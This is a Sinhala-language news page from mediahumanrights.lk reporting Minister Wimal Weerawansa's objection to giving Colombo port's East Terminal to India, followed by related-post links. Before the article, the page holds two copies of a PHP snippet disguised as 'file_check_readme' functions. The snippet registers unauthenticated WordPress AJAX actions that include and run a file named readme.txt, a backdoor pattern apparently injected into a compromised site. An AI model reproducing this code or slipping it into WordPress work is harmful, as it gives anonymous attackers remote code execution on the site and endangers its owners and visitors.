if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ඉන්දියාව වැඩිපුර ප‍්‍රතිඅපනයන කරන නිසා නැගෙනහිර පර්යන්තය ඉන්දියාවට දෙන්න ඔ්න කියන්නෙ මෝඩ තර්කයක්..- විමල් - mediahumanrights.lk
mediahumanrights.lk
News Political

ඉන්දියාව වැඩිපුර ප‍්‍රතිඅපනයන කරන නිසා නැගෙනහිර පර්යන්තය ඉන්දියාවට දෙන්න ඔ්න කියන්නෙ මෝඩ තර්කයක්..- විමල්

ඉන්දියාවෙන් වැඩිපුර කන්ටේනර ප්‍රතිඅපනය සදහා එන්නේ යයි කියා නැගෙනහිර පර්යන්තය ඉන්දියාවට ලබා දීම හෝ දෙන්න වෙනවා යැයි කීම මෝඩ තර්කයක් බව අමාත්‍ය විමල් වීරවංශ මහතා සඳහන් කරයි.

කොළඹ වරාය බදු වරායත් සදා ගැනීමට ඉන්දියාවට පුළුවන්කමක් තිබුනේ නම් ඔවුන් එය දැනටමත් කර අවසන් බවත් පවසන අමාත්‍යවරයා ප‍්‍රති අපනයනයට කොළඹ වරාය භාවිතා කිරීමට ඉන්දියාවට සිදුව ඇත්තේ කොළඹ වරායේ විශේෂත්වය නිසා බවද ඔහුගේ අදහසයි.

එනිසා ප‍්‍රතිඅපනයන බහුතරය ඉන්දියාවට කරන බව සඳහන් කරමින් කොළඹ වරාය නැගෙනහිර පර්යන්තය ඉන්දියාවට දීමත් සාධාරණීකරණය කිරීමට උත්සාහ කිරීම මෝඩ තර්කයක් බව ඇමතිවරයා කියා සිටී.

කෙසේ වෙතත් මේ සම්බන්ධයෙන් අවසන් කැබිනට් පත්‍රිකාව මෙතෙක් කැබිනට් මණ්ඩලය ඉදිරිපත් වී නැතැයිද පැවසූ ඇමැතිවරයා කැබිනට් මණ්ඩලයට එය ඉදිරිපත් වූ පසු අධ්‍යනය කර බලා අදහස පළ කරන බවද කියා සිටියේය.

lankacnews

Related posts

අපි රට බාර ගත්තේ හාල් ඇටයක්වත් නැතිව..- මාලිමා මන්ත‍්‍රීනී

Shiran Viraj

ජනාධිපති අපේක්‍ෂක ගෝටාභය ස්ථිරයි.. මහින්ද විශේෂ ප‍්‍රකාශයට සූදානම්..

Shiran Viraj

සමථයකට පත් වෙන්න තරුණිය ඩොලර් ලක්‍ෂයක් ඉල්ලයි.. ධනුෂ්ක බෑ කියයි.. තරුණිය 25,000 තෙක්් අඩු කරයි..

Shiran Viraj